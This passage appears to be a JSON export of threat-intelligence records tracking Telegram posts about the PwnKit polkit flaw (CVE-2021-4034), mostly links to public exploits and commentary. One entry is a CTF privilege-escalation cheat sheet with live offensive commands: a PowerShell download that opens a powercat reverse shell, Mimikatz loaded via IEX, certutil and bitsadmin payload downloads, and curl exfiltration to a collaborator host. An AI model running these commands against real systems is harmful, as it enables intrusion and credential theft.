2024.\n\n\n---\n\nSource:\nThe Hacker News \u2013 CL-STA-0969 Campaign", "creation_timestamp": "2025-08-03T10:00:38.000000Z"}, {"uuid": "1750dae9-529e-4caf-be92-8f6e85056dd5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/poxek/564", "content": "\u200bCVE-2021-4034\n\n\u041f\u043e\u044f\u0432\u0438\u043b\u0441\u044f \u0441\u043f\u043b\u043e\u0438\u0442 \u043a \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 LPE \u0432 Linux \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u0430\u0445 \u0447\u0435\u0440\u0435\u0437 polkit.\n\n\u042d\u043a\u0441\u043f\u043b\u043e\u0438\u0442: \nhttps://github.com/berdav/CVE-2021-4034/blob/main/cve-2021-4034.c\n\n\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438:\nhttps://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt\n\n@dnevnik_infosec", "creation_timestamp": "2022-01-26T08:26:27.000000Z"}, {"uuid": "efdc5893-cf35-4634-a80b-4b57dd003ba7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/poxek/625", "content": "CVE-2021-4034\nOne Day \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 polkit\n\n\u041f\u0440\u043e\u0441\u0442\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u0435:\nmake\u00a0\n./cve-2021-4034\n\nhttps://github.com/berdav/CVE-2021-4034\n\n@dnevnik_infosec", "creation_timestamp": "2022-01-29T11:21:22.000000Z"}, {"uuid": "4bccd219-23b7-40a6-b6aa-68a473476a11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/avleonovrus/9", "content": "\u0422\u0443\u0442 \u0434\u043e\u0431\u0430\u0432\u0438\u043b \u043a\u043e\u043c\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u0438 \u043d\u0430 \u0440\u0443\u0441\u0441\u043a\u043e\u043c \u0438\u0437 \u0447\u0435\u0440\u043d\u043e\u0432\u0438\u043a\u043e\u0432 \u0438 \u0442\u0430\u0439\u043c\u0438\u043d\u0433. \u0412\u0441\u0435 \u0432 \u0434\u0435\u043b\u043e \ud83d\ude0a https://youtu.be/jgKK9ovlNFU \n\nActive Vulnerabilities\n\n01:31 \ud83d\udd34 \u201cCISA warns of hackers exploiting PwnKit Linux vulnerability (CVE-2021-4034)\u201d by BleepingComputer\n// \u041d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0430\u043c\u0435\u0440\u0438\u043a\u0430\u043d\u0446\u0430\u043c \u044d\u0442\u043e \u043d\u0443\u0436\u043d\u043e \u0431\u044b\u0441\u0442\u0440\u043e \u043f\u0430\u0442\u0447\u0438\u0442\u044c.\n03:14 \ud83d\udd34 \u201cAtlassian Confluence OGNL Injection Remote Code Execution (RCE) Vulnerability (CVE-2022-26134)\u201d by Qualys\n// \u0412 \u0441\u0442\u0430\u0442\u044c\u0435 Qualys \u043f\u0440\u0438\u0432\u043e\u0434\u044f\u0442 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 OGNL Injection, RCE Payload, Exploit POC, Exploit Analysis \u0438 Source Code Analysis. \u042d\u0442\u043e \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u0430\u044f \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0441\u0442\u0430\u0442\u044c\u044f. \u0415\u0441\u043b\u0438 \u0432\u0430\u043c \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e \u043a\u0430\u043a \u0442\u0430\u043a\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442\u0441\u044f \u0438 \u0434\u0435\u0442\u0435\u043a\u0442\u0438\u0440\u0443\u044e\u0442\u0441\u044f, \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0438\u0442\u0435 \u044d\u0442\u043e\u0442 \u043f\u043e\u0441\u0442. \n\nData sources\n\n05:27 \ud83d\udfe0 \u201cNew Vulnerability Database Catalogs Cloud Security Issues\u201d by DarkReading & Wiz\n// \u041d\u0435\u043f\u043e\u043d\u044f\u0442\u043d\u043e \u043d\u0430\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043d\u0443\u0436\u043d\u0430 \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u0430\u044f \u0431\u0430\u0437\u0430 \u0434\u0430\u043d\u043d\u044b\u0445. \u041a\u0430\u0436\u0435\u0442\u0441\u044f \u044d\u0442\u043e \u0432\u0441\u0435 \u043c\u043e\u0436\u043d\u043e \u0431\u044b\u043b\u043e \u0431\u044b \u043e\u0444\u043e\u0440\u043c\u0438\u0442\u044c \u043a\u0430\u043a CVEs. \u0422\u0435\u043c \u0431\u043e\u043b\u0435\u0435, \u0447\u0442\u043e \u0443 \u043c\u043d\u043e\u0433\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u0445 \u0432 \u044d\u0442\u043e\u0439 \u0431\u0430\u0437\u0435 \u0443\u0436\u0435 \u0435\u0441\u0442\u044c CVE IDs. \u041d\u043e \u0438\u043d\u0438\u0446\u0438\u0430\u0442\u0438\u0432\u0430 \u0445\u043e\u0440\u043e\u0448\u0430\u044f. \u041b\u0438\u0448\u043d\u0438\u0439 \u0440\u0430\u0437 \u0434\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442, \u0447\u0442\u043e \u0443 MITRE \u0438 NVD \u0435\u0441\u0442\u044c \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b. \n\nAnalytics\n\n07:23 \ud83d\udfe2 \u201cMITRE shares this year\u2019s list of most dangerous software bugs (CWE Top 25)\u201d by BleepingComputer\n// \u041f\u043e\u0445\u043e\u0436\u0435 \u043d\u0430 \u043f\u0440\u0430\u0432\u0434\u0443, \u0445\u043e\u0442\u044f 'OS Command Injection' \u043a\u0430\u0436\u0435\u0442\u0441\u044f \u0434\u043e\u043b\u0436\u043d\u043e \u0431\u044b\u0442\u044c \u0432\u044b\u0448\u0435. \u041d\u0443 \u0438 \u043d\u0430\u0434\u043e \u043f\u043e\u043d\u0438\u043c\u0430\u0442\u044c, \u0447\u0442\u043e CWE \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u044b \u043f\u0440\u0438\u0441\u0432\u0430\u044e\u0432\u0430\u044e\u0442\u0441\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432\u0440\u0443\u0447\u043d\u0443\u044e \u0438 \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u0442\u0443\u0442 \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u043e\u0448\u0438\u0431\u043a\u0438 \u043a\u043b\u0430\u0441\u0441\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438. \u041d\u043e \u0432\u0441\u0435 \u0440\u0430\u0432\u043d\u043e \u043b\u044e\u0431\u043e\u043f\u044b\u0442\u043d\u043e. \n09:06 \ud83d\udfe0 \u201cCyberattacks via Unpatched Systems Cost Orgs More Than Phishing\u201d by DarkReading & Tetra Defense\n// \u0425\u043e\u0440\u043e\u0448\u0435\u0435 \u0437\u0430\u043c\u0435\u0447\u0430\u043d\u0438\u0435 \u0432 \u0441\u0442\u0430\u0442\u044c\u0435: \"Data on successful compromises can help companies determine the most critical attack vectors to address, but it should be noted that the conclusions depend greatly on the specific incident-response firm\". \u041d\u043e \u0442\u043e, \u0447\u0442\u043e MFA \u0438 \u043f\u0430\u0442\u0447\u0438\u043d\u0433 \u044d\u0442\u043e \u0432\u0430\u0436\u043d\u043e - \u043d\u0435 \u043f\u043e\u0441\u043f\u043e\u0440\u0438\u0448\u044c.\n11:07 \ud83d\udd34 \u201cZero-Days Aren\u2019t Going Away Anytime Soon & What Leaders Need to Know\u201d by DarkReading & Arctic Wolf\n// \u041d\u0443, \u0432 \u0446\u0435\u043b\u043e\u043c \u043d\u0435 \u043f\u043e\u043f\u043e\u0440\u0438\u0448\u044c. \u041c\u043e\u0451 \u043c\u043d\u0435\u043d\u0438\u0435 - \u043f\u043e\u043a\u0430 \u043a\u0440\u0438\u0442\u0438\u0447\u043d\u044b\u0435 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043d\u043e, \u0434\u0443\u043c\u0430\u0442\u044c \u043e Zero-Days \u043f\u0440\u0435\u0436\u0434\u0435\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u043e. \u0410 \u0442\u0430\u043a, \u044d\u0442\u043e \u043a\u043e\u043d\u0435\u0447\u043d\u043e \u0432 \u043f\u0435\u0440\u0432\u0443\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c \u0437\u0430\u0434\u0430\u0447\u0430 SOC.\n\nVM vendors write about Vulnerability Management\n\n13:57 \ud83d\udfe1 \u201cWhy We\u2019re Getting Vulnerability Management Wrong\u201d by DarkReading & Rezilion\n// \u042d\u0442\u043e \u0434\u0430\u0432\u043d\u0438\u0448\u043d\u0438\u0439 \u0441\u043f\u043e\u0440: \u0441\u0442\u043e\u0438\u0442 \u043b\u0438 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u044f\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0441\u043e\u0444\u0442\u0435, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0432 \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0438\u0439 \u043c\u043e\u043c\u0435\u043d\u0442 \u043d\u0435 \u0437\u0430\u043f\u0443\u0449\u0435\u043d? \u041d\u0443 \u0438 \u043e\u0431\u044b\u0447\u043d\u043e \u043d\u0430 \u044d\u0442\u043e \u043e\u0442\u0432\u0435\u0447\u0430\u044e\u0442 \u0434\u0430. \u041f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e \u043d\u0438\u043a\u0442\u043e \u043d\u0435 \u043c\u043e\u0436\u0435\u0442 \u0433\u0430\u0440\u0430\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c, \u0447\u0442\u043e \u0441\u043e\u0444\u0442 \u0432\u0434\u0440\u0443\u0433 \u043d\u0435 \u043d\u0430\u0447\u043d\u0435\u0442 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0442\u044c\u0441\u044f. \u041d\u043e \u0435\u0441\u043b\u0438 \u0431\u0443\u0434\u0435\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0432\u044b\u0434\u0435\u043b\u0438\u0442\u044c \u0441\u0440\u0435\u0434\u0438 \u043a\u0440\u0438\u0442\u0438\u0447\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u0432 \u0441\u043e\u0444\u0442\u0435, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0443\u0436\u0435 \u0437\u0430\u043f\u0443\u0449\u0435\u043d \u0438\u043b\u0438 \u0440\u0435\u0433\u0443\u043b\u044f\u0440\u043d\u043e \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442\u0441\u044f, \u0442\u043e \u044d\u0442\u043e \u0445\u043e\u0440\u043e\u0448\u0438\u0439 \u0438\u0441\u043f\u0442\u043e\u0447\u043d\u0438\u043a \u0434\u0430\u043d\u043d\u044b\u0445 \u0434\u043b\u044f \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0439 \u043f\u0440\u0438\u043e\u0440\u0438\u0442\u0438\u0437\u0430\u0446\u0438\u0438. \u041f\u043e\u0447\u0435\u043c\u0443 \u0431\u044b \u0438 \u043d\u0435\u0442. \u0425\u043e\u0440\u043e\u0448\u043e, \u0447\u0442\u043e Rezilion \u044d\u0442\u043e \u043f\u043e\u0434\u0441\u0432\u0435\u0447\u0438\u0432\u0430\u044e\u0442. \n16:41 \ud83d\udd34 \u201cRisk-based Remediation Powered by Patch Management in Qualys VMDR 2.0\u201d by Qualys\n// \u041d\u0430 \u0441\u0430\u043c\u043e\u043c \u0434\u0435\u043b\u0435 \u0434\u0430\u0432\u043d\u043e \u0431\u044b\u043b\u043e \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e \u0447\u0442\u043e \u0436\u0435 \u043d\u043e\u0432\u043e\u0433\u043e \u0432 Qualys Vulnerability Management, Detection and Response. \u0412 \u0446\u0435\u043b\u043e\u043c, \u044d\u0442\u043e \u043f\u043e\u0445\u043e\u0436\u0435 \u043d\u0430 Tenable vulnerability priority rating (VPR). \u041d\u0430\u0432\u0435\u0440\u043d\u043e\u0435 \u0438 \u0444\u043e\u0440\u043c\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u043f\u0440\u0438\u043c\u0435\u0440\u043d\u043e \u0442\u0430\u043a \u0436\u0435. \u041d\u043e \u043f\u0440\u043e \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u043e\u0435 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438 TruRisk \u043d\u0430\u0434\u043e \u0431\u0443\u0434\u0435\u0442 \u0438\u0441\u043a\u0430\u0442\u044c \u0433\u0434\u0435-\u0442\u043e \u0432 \u0434\u0440\u0443\u0433\u043e\u043c \u043c\u0435\u0441\u0442\u0435. \u042f \u0441\u043e\u0433\u043b\u0430\u0441\u0435\u043d \u0441 \u0442\u0435\u043c, \u0447\u0442\u043e \u0444\u043e\u043a\u0443\u0441 VM \u0434\u043e\u043b\u0436\u0435\u043d \u0431\u044b\u0442\u044c \u0438\u043c\u0435\u043d\u043d\u043e \u043d\u0430 Remediation \u0438 \u0445\u043e\u0440\u043e\u0448\u043e, \u0447\u0442\u043e Qualys \u043f\u0440\u043e\u0434\u0432\u0438\u0433\u0430\u044e\u0442 \u044d\u0442\u0443 \u0442\u0435\u043c\u0443. \u0414\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u0435\u043d \u043b\u0438 \u043e\u0431\u044a\u0435\u043c \u043d\u043e\u0432\u044b\u0445 \u0444\u0438\u0447, \u0447\u0442\u043e\u0431\u044b \u043d\u0430\u0437\u044b\u0432\u0430\u0442\u044c \u044d\u0442\u043e VMDR 2.0? \u041f\u043e\u043a\u0430 \u044d\u0442\u043e \u043d\u0435 \u043a\u0430\u0436\u0435\u0442\u0441\u044f \u0442\u0430\u043a. \u041a\u0430\u0436\u0435\u0442\u0441\u044f, \u0447\u0442\u043e \u0435\u0441\u043b\u0438 \u0431\u044b Remediation \u0431\u044b\u043b \u043f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043d \u0434\u043b\u044f 100% \u0445\u043e\u0441\u0442\u043e\u0432 (\u0447\u0442\u043e \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u043f\u0440\u0438\u043d\u0446\u0438\u043f\u0438\u0430\u043b\u044c\u043d\u043e \u0434\u0440\u0443\u0433\u043e\u0433\u043e \u043f\u043e\u0434\u0445\u043e\u0434\u0430 \u043a \u0442\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044e \u0440\u0430\u0431\u043e\u0442\u043e\u0441\u043f\u043e\u0441\u043e\u0431\u043d\u043e\u0441\u0442\u0438 \u043f\u043e\u0441\u043b\u0435 \u043f\u0430\u0442\u0447\u0430), \u0442\u043e \u0442\u043e\u0433\u0434\u0430 \u044d\u0442\u043e \u0431\u044b\u043b\u043e \u0431\u044b 2.0. \u041d\u043e \u043c\u0430\u0440\u043a\u0435\u0442\u043e\u043b\u043e\u0433\u0430\u043c Qualys \u0432\u0438\u0434\u043d\u0435\u0435. \n20:37 \ud83d\udfe2 \u201cModern IT Security Teams\u2019 Inevitable Need for Advanced Vulnerability Management\u201d by Threatpost & Secpod\n// \u0414\u0430\u0435\u0442\u0441\u044f \u0441\u043f\u0438\u0441\u043e\u043a \u043f\u0440\u043e\u0431\u043b\u0435\u043c \u0438 \u0434\u043b\u044f \u043f\u0440\u0435\u043e\u0434\u0430\u043b\u0435\u043d\u0438\u044f \u044d\u0442\u0438\u0445 \u043f\u0440\u043e\u0431\u043b\u0435\u043c \u043d\u0443\u0436\u0435\u043d Advanced Vulnerability Management \u043e\u0442 Secpod. \u0412 \u0446\u0435\u043b\u043e\u043c, \u0441\u043f\u0438\u0441\u043e\u043a \u0441\u043f\u0440\u0430\u0432\u0435\u0434\u043b\u0438\u0432\u044b\u0439 \u0438 \u0442\u043e, \u0447\u0442\u043e \u043e\u043d\u0438 \u043e\u0431\u0440\u0430\u0449\u0430\u044e\u0442 \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435 \u043d\u0430 vulnerabilities beyond CVEs \u043a\u0430\u0436\u0435\u0442\u0441\u044f \u043c\u043d\u0435 \u043e\u0447\u0435\u043d\u044c \u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u044b\u043c. \n22:25 de-Westernization of IT\n\u0441\u043c.\u0432\u044b\u0448\u0435 https://t.me/avleonovrus/3\n\n#VulnerabilityManagement #InformationSecurity\n\n@avleonovrus #VMnews", "creation_timestamp": "2023-09-21T09:32:05.000000Z"}, {"uuid": "bacd65e2-a69a-43ed-a263-d74bbf53ff33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://t.me/poxek/2527", "content": "\u0421\u0435\u0433\u043e\u0434\u043d\u044f \u043f\u043e\u0433\u043e\u0432\u043e\u0440\u0438\u043c \u043d\u0435\u043c\u043d\u043e\u0433\u043e \u043e\u0431 \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u0430 \u0438\u043c\u0435\u043d\u043d\u043e CVE-2021-4034 aka Pwnkit\n\nCORS | E7PENTEST SUBSCRIBE", "creation_timestamp": "2022-10-10T07:32:55.000000Z"}, {"uuid": "3f0c8ca6-6790-4e0a-ad70-d0aaecbec357", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/poxek/1427", "content": "\u200bCVE-2021-4034\n\u041b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0435 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u043f\u0440\u0430\u0432 \u0447\u0435\u0440\u0435\u0437 pkexec\nhttps://github.com/PwnFunction/CVE-2021-4034\n\n\u0414\u043d\u0435\u0432\u043d\u0438\u043a \u0411\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u0438\u043a\u0430 \ud83d\udee1\ufe0f", "creation_timestamp": "2022-04-29T07:00:04.000000Z"}, {"uuid": "c349bfa5-c3a8-4621-b1b6-f90d3f6f9c21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/arm1tage/128", "content": "\u041e\u0431\u0449\u0438\u0435 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0441\u0442\u0438 \u0434\u043b\u044f \u043f\u0440\u043e\u0445\u043e\u0436\u0434\u0435\u043d\u0438\u044f \u043b\u0430\u0431\n\n\u2014 Priv Esc Linux \u2014\nfind / -perm -u=s -type f 2>/dev/null - binaries to use for PrivEx\nfind / -perm /4000 2>/dev/null -ls\n\ngetcap -r / 2>/dev/null\n\nfind / -writable 2>/dev/null | cut -d \"/\" -f 2,3 | grep -v proc | sort -u\n\nsudo -l\n\nexport PATH=/tmp:$PATH\necho $PATH\n\ncat .bash_history\n\n/etc/shadow\n/etc/crontab\n\nhostname / uname -a / cat /proc/version / ps / env / history / cat /etc/os-release\n\nGTFObins\nhttps://gtfobins.github.io/\n\n\n\u2014 Priv Esc Windows \u2014\n\n%userprofile%\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadline\\ConsoleHost_history.txt\nC:\\inetpub\\wwwroot\\web.config\nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\web.config\n\n5985 - WinRM port\n\nCheck saved creds:\ncmdkey /list\nrunas /savecred /user:admin cmd.exe\n\nFind Creds from PuTTY:\nreg query HKEY_CURRENT_USER\\Software\\SimonTatham\\PuTTY\\Sessions\\ /f \"Proxy\" /s\n\nCheck permissions on executables:\nicacls c:\\tasks\\schtask.bat\n\nGive permissions on executables:\nicacls C:\\Windows\\System32\\utilman.exe /grant Administrator:F\n\nTake ownership of the file:\ntakeown /f c:\\Windows\\System32\\sethc.exe\n\nCheck Installed software:\nwmic product get name,version,vendor\n\n\u2014 Other \u2014\n\n/usr/share/doc/python-impacket/example\n\nnc -v 0.0.0.0 4443\n\n\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\nget file via nc:\nOn the attack machine: cat linpeas.sh| nc -lvnp 1337\nOn the target machine: nc 1.1.1.1 1337 > linpeas.sh\n\nget file via wget:\nwget http://1.1.1.1:1337/linpeas.sh\n\ncurl \u2014data @/home/kali/flag burp.collaborator\n\nLOLBAS:\ncmd.exe /C certutil.exe -urlcache -split -f http://10.9.3.48:1337/nc.exe nc.exe\nbitsadmin /transfer wcb /priority foreground http://10.10.15.193:1337/upload_nix.txt C:\\Users\\htb-student\\Desktop\\test.txt\n\nget file via smb:\nImpacket smb:\nsudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test\n\nOn windows:\ncopy \\\\10.10.14.37\\smb\\nc64.exe\nnet use n: \\\\192.168.220.133\\share /user:test test\n\npowershell -c \"IEX(New-Object System.Net.WebClient).DownloadString('http://1.1.1.1:1337/powercat.ps1');powercat -c 1.1.1.1 -p 4443 -e cmd\"\n\npowershell \"(New-Object System.Net.WebClient).Downloadfile('http://:8000/shell-name.exe','shell-name.exe')\"\n\npowershell -c Invoke-WebRequest -Uri http://10.11.31.240/winPEASany.exe -OutFile C:\\Users\\bill\\winPEASany.exe\n\ngit file via ftp:\npython3 -m pyftpdlib --port 21\n(New-Object Net.WebClient).DownloadFile('ftp://192.168.49.128/file.txt', 'C:\\Users\\Public\\ftp-file.txt')\nHTB Notes:\n(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1','C:\\Users\\Public\\Downloads\\PowerView.ps1')\nIEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}\n\nInvoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1\nInvoke-WebRequest https:///PowerView.ps1 -UseBasicParsing | IEX\npython3 -c 'import urllib.request;urllib.request.urlretrieve(\"https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh\", \"LinEnum.sh\")'\n\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\nsqlitebrowser database.sqlite \nhttp://167.99.202.131:31462/storage/v1_db_backup_1604123342.tar.gz\ntar xvf v1_db_backup_1604123342.tar.gz \n\n/usr/share/windows-resources/binaries\n\nxfreerdp /dynamic-resolution +clipboard /cert:ignore /v:10.10.203.235 /u:Administrator /p:'TryH4ckM3!'\n\nVulnerable to CVE-2021-4034\nhttps://github.com/berdav/CVE-2021-4034\n\n\n#windows #linux #ctf", "creation_timestamp": "2024-12-11T18:23:04.000000Z"}, {"uuid": "d276b8a9-dc0e-4f82-b328-93f4092c4c96", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://t.me/avleonovrus/80", "content": "\u0412 \u043f\u043e\u043b\u043a\u0443 Linux \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0438\u0445 \u043f\u043e\u0434\u043d\u044f\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0434\u043e root-\u0430 \u043f\u0440\u0438\u0431\u044b\u043b\u043e. \u0412\u0441\u0442\u0440\u0435\u0447\u0430\u0435\u043c DirtyCred (CVE-2021-4154 - \u0444\u0435\u0432\u0440\u0430\u043b\u044c\u0441\u043a\u0430\u044f, \u0435\u0441\u0442\u044c PoC; CVE-2022-2588 - \u0441\u0432\u0435\u0436\u0430\u044f, \u043f\u043e\u043a\u0430 \u043d\u0435\u0442 PoC-\u0430). 8 \u043b\u0435\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0438\u043a\u0442\u043e \u043d\u0435 \u0437\u0430\u043c\u0435\u0447\u0430\u043b. \u0418\u043b\u0438 \u0437\u0430\u043c\u0435\u0447\u0430\u043b\u0438 \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438, \u043d\u043e \u043f\u043e\u043c\u0430\u043b\u043a\u0438\u0432\u0430\u043b\u0438. \u0415\u0441\u0442\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e NVD \u043a\u0430\u043a \u043e\u0431\u044b\u0447\u043d\u043e \u0442\u043e\u0440\u043c\u043e\u0437\u0438\u0442 \u0438 \u0442\u0430\u043c \u043d\u043e\u0432\u043e\u0433\u043e \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u0430 \u043f\u043e\u043a\u0430 \u043d\u0435\u0442, \u043d\u043e \u043e\u043d \u0432\u043e \u0432\u0441\u044e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0432 \u0431\u044e\u043b\u043b\u0435\u0442\u0435\u043d\u044f\u0445 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438. \n\n\u0421\u0443\u0434\u044f \u043f\u043e \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u044e \u044d\u0442\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u044f\u0434\u0440\u0430, \u043f\u043e\u0445\u043e\u0436\u0430\u044f \u043d\u0430 \u043c\u0430\u0440\u0442\u043e\u0432\u0441\u043a\u0443\u044e Dirty Pipe (CVE-2022-0847), \u0442\u043e\u043b\u044c\u043a\u043e \u043a\u0440\u0443\u0447\u0435, \u0442.\u043a. \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0441\u0442\u0430\u0431\u0438\u043b\u044c\u043d\u0435\u0435:\n\n\"The novel exploitation method, according to the researchers, pushes the dirty pipe to the next level, making it more general as well as potent in a manner that could work on any version of the affected kernel.\"\n\n\u0418 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u0438\u0437\u0430\u0446\u0438\u044f \u043d\u0435 \u0441\u043f\u0430\u0441\u0430\u0435\u0442:\n\n\"Second, while it is like the dirty pipe that could bypass all the kernel protections, our exploitation method could even demonstrate the ability to escape the container actively that Dirty Pipe is not capable of.\"\n\n\u041d\u0443 \u0438 \u0442\u0430\u043a-\u0442\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0438\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0432 Linux root-\u0430 